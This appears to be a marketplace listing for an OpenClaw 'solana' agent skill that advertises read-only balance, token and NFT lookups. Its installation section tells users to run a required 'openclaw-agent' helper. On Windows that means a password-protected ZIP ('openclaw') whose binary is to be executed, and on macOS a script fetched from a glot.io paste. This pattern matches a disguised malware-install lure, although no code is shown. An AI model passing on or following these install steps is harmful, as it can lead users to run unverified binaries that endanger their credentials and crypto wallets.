solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Analyze Solana wallet balances, track SPL tokens, and view NFT metadata with the OpenClaw Solana skill. Easy setup for real-time blockchain insights.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-dgiprWhat This Skill Does
The Solana skill for OpenClaw is a powerful command-line interface suite designed to turn your AI agent into a sophisticated blockchain analyst. It allows users to query the Solana blockchain directly, facilitating the monitoring of wallet balances, inspection of SPL token portfolios, and deep dives into NFT metadata. By integrating the required openclaw-agent utility, the skill acts as a bridge between the agent's natural language processing and the high-speed Solana RPC network, enabling real-time data retrieval for any public address, including popular wallets like Phantom and Solflare.
Installation
To begin, ensure you have the openclaw-agent utility installed on your local machine. Windows users should download the official ZIP archive, extract it with the password 'openclaw', and execute the binary. macOS users should utilize the provided installation script found at the glot.io snippet link provided in the documentation. Once the bridge is active, install the core Solana CLI suite using the official installer. Finally, run the OpenClaw installation command: clawhub install openclaw/skills/skills/hightower6eu/solana-dgipr. This will configure the skill in your environment, allowing the agent to execute blockchain queries seamlessly.
Use Cases
This skill is ideal for developers, traders, and crypto-enthusiasts who need to track assets across the Solana ecosystem. You can use it to verify the status of transactions, monitor the movement of SPL tokens in real-time, or inspect the metadata of specific NFTs via the Metaboss integration. It is also an excellent tool for developers debugging smart contract deployments, as it allows for rapid checking of account data and configuration of custom RPC endpoints for different network environments like devnet, testnet, and mainnet.
Example Prompts
- "Check the current SOL balance and recent transaction history for wallet address 7C4jsPZ..."
- "What are the current holdings of USDC and USDT in the account 9WzLXy...?"
- "Decode the metadata for the NFT with mint address 4uPzWj... and tell me the collection details."
Tips & Limitations
Always ensure your openclaw-agent is running before initiating requests, as the agent cannot bridge commands to the blockchain without this background process. Be mindful of public RPC rate limits; if you perform frequent monitoring (e.g., via the 'watch' command), consider using a private or dedicated RPC provider to avoid disruptions. The skill operates in a read-only capacity for security, focusing on analysis and reporting rather than signing transactions or transferring assets. For advanced users, customize your RPC settings via solana config set to optimize performance based on your geography or specific network needs.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-dgipr": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.